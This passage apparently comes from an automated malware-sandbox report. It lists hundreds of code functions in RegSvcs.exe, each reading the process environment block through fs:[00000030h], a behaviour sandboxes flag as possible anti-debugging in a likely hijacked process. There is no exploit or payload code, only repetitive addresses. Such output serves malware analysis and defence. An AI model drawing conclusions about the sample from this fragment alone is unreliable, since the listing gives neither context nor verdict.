Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A350 mov eax, dword ptr fs:[00000030h]	4_2_0133A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F8347 mov eax, dword ptr fs:[00000030h]	4_2_012F8347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F8347 mov eax, dword ptr fs:[00000030h]	4_2_012F8347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F8347 mov eax, dword ptr fs:[00000030h]	4_2_012F8347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137C3B0 mov eax, dword ptr fs:[00000030h]	4_2_0137C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013093A6 mov eax, dword ptr fs:[00000030h]	4_2_013093A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013093A6 mov eax, dword ptr fs:[00000030h]	4_2_013093A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132A390 mov eax, dword ptr fs:[00000030h]	4_2_0132A390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132A390 mov eax, dword ptr fs:[00000030h]	4_2_0132A390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132A390 mov eax, dword ptr fs:[00000030h]	4_2_0132A390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380 mov eax, dword ptr fs:[00000030h]	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380 mov eax, dword ptr fs:[00000030h]	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380 mov eax, dword ptr fs:[00000030h]	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380 mov eax, dword ptr fs:[00000030h]	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380 mov eax, dword ptr fs:[00000030h]	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131F380 mov eax, dword ptr fs:[00000030h]	4_2_0131F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF38A mov eax, dword ptr fs:[00000030h]	4_2_013BF38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013333D0 mov eax, dword ptr fs:[00000030h]	4_2_013333D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013343D0 mov ecx, dword ptr fs:[00000030h]	4_2_013343D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FC3C7 mov eax, dword ptr fs:[00000030h]	4_2_012FC3C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013843D5 mov eax, dword ptr fs:[00000030h]	4_2_013843D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE3C0 mov eax, dword ptr fs:[00000030h]	4_2_012FE3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE3C0 mov eax, dword ptr fs:[00000030h]	4_2_012FE3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE3C0 mov eax, dword ptr fs:[00000030h]	4_2_012FE3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013063CB mov eax, dword ptr fs:[00000030h]	4_2_013063CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01320230 mov ecx, dword ptr fs:[00000030h]	4_2_01320230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A22B mov eax, dword ptr fs:[00000030h]	4_2_0133A22B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A22B mov eax, dword ptr fs:[00000030h]	4_2_0133A22B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A22B mov eax, dword ptr fs:[00000030h]	4_2_0133A22B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380227 mov eax, dword ptr fs:[00000030h]	4_2_01380227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380227 mov eax, dword ptr fs:[00000030h]	4_2_01380227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380227 mov eax, dword ptr fs:[00000030h]	4_2_01380227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138B214 mov eax, dword ptr fs:[00000030h]	4_2_0138B214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138B214 mov eax, dword ptr fs:[00000030h]	4_2_0138B214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FA200 mov eax, dword ptr fs:[00000030h]	4_2_012FA200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F821B mov eax, dword ptr fs:[00000030h]	4_2_012F821B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139327E mov eax, dword ptr fs:[00000030h]	4_2_0139327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BD270 mov eax, dword ptr fs:[00000030h]	4_2_013BD270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB273 mov eax, dword ptr fs:[00000030h]	4_2_012FB273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB273 mov eax, dword ptr fs:[00000030h]	4_2_012FB273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB273 mov eax, dword ptr fs:[00000030h]	4_2_012FB273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137D250 mov eax, dword ptr fs:[00000030h]	4_2_0137D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137D250 mov ecx, dword ptr fs:[00000030h]	4_2_0137D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C124C mov eax, dword ptr fs:[00000030h]	4_2_013C124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C124C mov eax, dword ptr fs:[00000030h]	4_2_013C124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C124C mov eax, dword ptr fs:[00000030h]	4_2_013C124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C124C mov eax, dword ptr fs:[00000030h]	4_2_013C124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F24A mov eax, dword ptr fs:[00000030h]	4_2_0132F24A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF247 mov eax, dword ptr fs:[00000030h]	4_2_013BF247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F92AF mov eax, dword ptr fs:[00000030h]	4_2_012F92AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB2BC mov eax, dword ptr fs:[00000030h]	4_2_013DB2BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB2BC mov eax, dword ptr fs:[00000030h]	4_2_013DB2BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB2BC mov eax, dword ptr fs:[00000030h]	4_2_013DB2BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB2BC mov eax, dword ptr fs:[00000030h]	4_2_013DB2BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF2AE mov eax, dword ptr fs:[00000030h]	4_2_013BF2AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C92AB mov eax, dword ptr fs:[00000030h]	4_2_013C92AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013242AF mov eax, dword ptr fs:[00000030h]	4_2_013242AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013242AF mov eax, dword ptr fs:[00000030h]	4_2_013242AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FC2B0 mov ecx, dword ptr fs:[00000030h]	4_2_012FC2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01307290 mov eax, dword ptr fs:[00000030h]	4_2_01307290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01307290 mov eax, dword ptr fs:[00000030h]	4_2_01307290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01307290 mov eax, dword ptr fs:[00000030h]	4_2_01307290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E289 mov eax, dword ptr fs:[00000030h]	4_2_0137E289
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FD2EC mov eax, dword ptr fs:[00000030h]	4_2_012FD2EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FD2EC mov eax, dword ptr fs:[00000030h]	4_2_012FD2EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013102F9 mov eax, dword ptr fs:[00000030h]	4_2_013102F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F72E0 mov eax, dword ptr fs:[00000030h]	4_2_012F72E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A2E0 mov eax, dword ptr fs:[00000030h]	4_2_0130A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013082E0 mov eax, dword ptr fs:[00000030h]	4_2_013082E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013082E0 mov eax, dword ptr fs:[00000030h]	4_2_013082E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013082E0 mov eax, dword ptr fs:[00000030h]	4_2_013082E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013082E0 mov eax, dword ptr fs:[00000030h]	4_2_013082E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013332C0 mov eax, dword ptr fs:[00000030h]	4_2_013332C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013332C0 mov eax, dword ptr fs:[00000030h]	4_2_013332C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D32C9 mov eax, dword ptr fs:[00000030h]	4_2_013D32C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013232C5 mov eax, dword ptr fs:[00000030h]	4_2_013232C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01303536 mov eax, dword ptr fs:[00000030h]	4_2_01303536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01303536 mov eax, dword ptr fs:[00000030h]	4_2_01303536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342539 mov eax, dword ptr fs:[00000030h]	4_2_01342539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F753F mov eax, dword ptr fs:[00000030h]	4_2_012F753F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F753F mov eax, dword ptr fs:[00000030h]	4_2_012F753F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F753F mov eax, dword ptr fs:[00000030h]	4_2_012F753F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133F523 mov eax, dword ptr fs:[00000030h]	4_2_0133F523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01331527 mov eax, dword ptr fs:[00000030h]	4_2_01331527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131252B mov eax, dword ptr fs:[00000030h]	4_2_0131252B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov ecx, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov ecx, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF51B mov eax, dword ptr fs:[00000030h]	4_2_013AF51B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138C51D mov eax, dword ptr fs:[00000030h]	4_2_0138C51D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01321514 mov eax, dword ptr fs:[00000030h]	4_2_01321514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB502 mov eax, dword ptr fs:[00000030h]	4_2_012FB502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01302500 mov eax, dword ptr fs:[00000030h]	4_2_01302500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E507 mov eax, dword ptr fs:[00000030h]	4_2_0132E507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133C50D mov eax, dword ptr fs:[00000030h]	4_2_0133C50D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133C50D mov eax, dword ptr fs:[00000030h]	4_2_0133C50D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131C560 mov eax, dword ptr fs:[00000030h]	4_2_0131C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01389567 mov eax, dword ptr fs:[00000030h]	4_2_01389567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB55F mov eax, dword ptr fs:[00000030h]	4_2_013DB55F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DB55F mov eax, dword ptr fs:[00000030h]	4_2_013DB55F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CA553 mov eax, dword ptr fs:[00000030h]	4_2_013CA553
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01336540 mov eax, dword ptr fs:[00000030h]	4_2_01336540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01338540 mov eax, dword ptr fs:[00000030h]	4_2_01338540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131E547 mov eax, dword ptr fs:[00000030h]	4_2_0131E547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130254C mov eax, dword ptr fs:[00000030h]	4_2_0130254C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013045B0 mov eax, dword ptr fs:[00000030h]	4_2_013045B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013045B0 mov eax, dword ptr fs:[00000030h]	4_2_013045B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013885AA mov eax, dword ptr fs:[00000030h]	4_2_013885AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01332594 mov eax, dword ptr fs:[00000030h]	4_2_01332594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138C592 mov eax, dword ptr fs:[00000030h]	4_2_0138C592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013A7591 mov edi, dword ptr fs:[00000030h]	4_2_013A7591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01339580 mov eax, dword ptr fs:[00000030h]	4_2_01339580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01339580 mov eax, dword ptr fs:[00000030h]	4_2_01339580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A580 mov eax, dword ptr fs:[00000030h]	4_2_0133A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A580 mov eax, dword ptr fs:[00000030h]	4_2_0133A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF582 mov eax, dword ptr fs:[00000030h]	4_2_013BF582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E588 mov eax, dword ptr fs:[00000030h]	4_2_0137E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E588 mov eax, dword ptr fs:[00000030h]	4_2_0137E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138C5FC mov eax, dword ptr fs:[00000030h]	4_2_0138C5FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B5E0 mov eax, dword ptr fs:[00000030h]	4_2_0130B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A5E7 mov ebx, dword ptr fs:[00000030h]	4_2_0133A5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A5E7 mov eax, dword ptr fs:[00000030h]	4_2_0133A5E7
